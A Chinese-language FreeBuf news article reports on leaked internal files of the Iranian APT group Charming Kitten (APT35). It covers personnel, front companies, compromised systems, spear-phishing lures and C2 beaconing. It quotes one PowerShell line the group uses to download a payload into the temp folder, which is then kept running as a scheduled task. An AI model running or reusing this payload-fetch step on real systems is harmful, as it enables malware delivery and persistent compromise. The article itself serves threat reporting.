FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

伊朗国家背景黑客组织"迷人小猫"（Charming Kitten，又称APT35）最新泄露的内部文件，曝光了该组织的核心成员、空壳公司以及遍布五大洲的数千台受控系统。

长期网络间谍行动体系

文件显示，伊朗伊斯兰革命卫队情报组织下属的40号部门长期开展结合网络间谍、监控与目标定位的综合入侵行动。被盗的仪表盘数据和工资记录首次将具体黑客活动与实名操作人员关联，而非以往匿名的威胁标签。

泄露资料进一步揭示了支撑这些行动的财务体系，包括"Sisters Team"和"Brothers Team"团队的工资单，以及通过伪装成普通IT或云服务提供商的空壳公司流转的资金。受控系统涉及VPN网关、邮件服务器以及用于操控已植入政府机构、高校和电信供应商内部恶意软件的C2节点，完整呈现了资金流、管理链与恶意软件的三位一体运作模式。

攻击目标与感染途径

安全研究员Nariman Gharib指出，泄露材料中包含的任务清单显示，"迷人小猫"的恶意软件专门针对外交、能源和公民社会网络。攻击通常通过鱼叉式钓鱼邮件、伪造登录页面或伪装成会议邀请/工资单/政策文件的恶意文档附件传播。

当用户打开诱饵文件并启用脚本或输入凭证后，攻击者即获得初始立足点，最终实现设备完全控制与数据窃取。泄露的仪表盘日志显示，受害主机的信标会通过HTTPS定期回连伊朗控制的服务器，这些通信往往隐藏在看似正常的网络流量中。

这些受控主机包括邮件网关、域控制器和用户笔记本电脑，使攻击者能访问邮件系统、文件共享和身份认证系统。泄露报告按地区和行业分类的感染机器集群，凸显了该行动的广泛影响。

感染机制与C2架构

感染通常始于用户打开宏或HTML诱饵后在内存运行的小型加载器。简短的PowerShell命令会从固定但隐藏的URL获取主载荷，相关技术细节已在"迷人小猫"工具的完整分析报告中披露：

Invoke-WebRequest $u -OutFile "$env:TEMP\\svc.exe"

泄露日志显示，该二进制文件会作为计划任务持续运行，在伪装成正常Windows活动的同时维持稳定访问。

参考来源：

Charming Kitten Leak Exposes Key Personnel, Front Companies, and Thousands of Compromised Systems

本文为 独立观点，未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件，请联系 FreeBuf 客服小蜜蜂（微信：freebee1024）